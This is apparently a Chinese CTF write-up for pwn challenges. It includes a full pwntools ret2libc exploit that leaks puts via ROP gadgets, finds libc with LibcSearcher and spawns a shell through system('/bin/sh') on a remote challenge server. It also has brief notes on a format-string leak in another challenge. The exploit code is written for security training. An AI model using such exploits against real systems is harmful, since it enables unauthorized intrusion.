ret2libc
看保护:
no pie 、 no canary
进入revenge函数后:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
| from pwn import *
import os
from LibcSearcher import *
context(arch='amd64', os='linux', log_level='debug')
if os.environ.get("ZELLIJ") == "0":
context.terminal = [
"zellij",
"action",
"new-pane",
"-d",
"right",
"-c",
"--",
"bash",
"-c",
]
exe = ELF('./pwn')
def conn():
if args.LOCAL:
io = process([exe.path])
if args.GDB:
gdb.attach(io)
elif args.GDB:
io = gdb.debug([exe.path], "b *main")
else:
io = remote('47.94.103.208', 24586)
return io
def main():
global io
io = conn()
offset = 0x218 + 4
puts_got = exe.got['puts']
puts_plt = exe.plt['puts']
add_rsi = 0x04010EB
reset_rsi = 0x04010E4
mov_rdi_rsi = 0x0401180
main = exe.symbols['main']
_rbp_ = puts_got - 0x20
revenge = exe.symbols['revenge']
payload = b'A' * offset + b'\x28' + p64(main)
payload = b'A' * offset + b'\x28' + p64(reset_rsi) + p64(add_rsi) + p64(mov_rdi_rsi) + p64(puts_plt) + p64(main) + p64(puts_got)
io.sendline(payload)
payload = b'A' * offset + b'\x28' + p64(main)
for _ in range(228):
io.sendline(payload)
recv_bytes = io.recvuntil(b'\x7f')[-6:]
puts_addr = u64(recv_bytes.ljust(8, b'\x00'))
log.success('puts_addr: ' + hex(puts_addr))
libc = LibcSearcher('puts', puts_addr)
libc.select_libc(9)
libc_base = puts_addr - libc.dump('puts')
ret = 0x040101a
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
payload = b'A' * offset + b'\x28' + p64(reset_rsi) + p64(add_rsi) + p64(mov_rdi_rsi) + p64(ret) + p64(system_addr) + p64(binsh_addr)
io.sendline(payload)
io.interactive()
if __name__ == "__main__":
main()
|
web苦手
逆向巨恶心, 不如叫逆向苦手
girlfriend
非常有用的格式化字符串漏洞
在replay()函数中:
可以泄露出pie基址、__libc_start_call_main地址、rbp中的值(main函数的rbp)、canary
第一次实验
第二次实验
第一次调试
布置栈布置了半天也没成功,我的思路是在栈上布置rop链,总是差一点,应该不是正确解法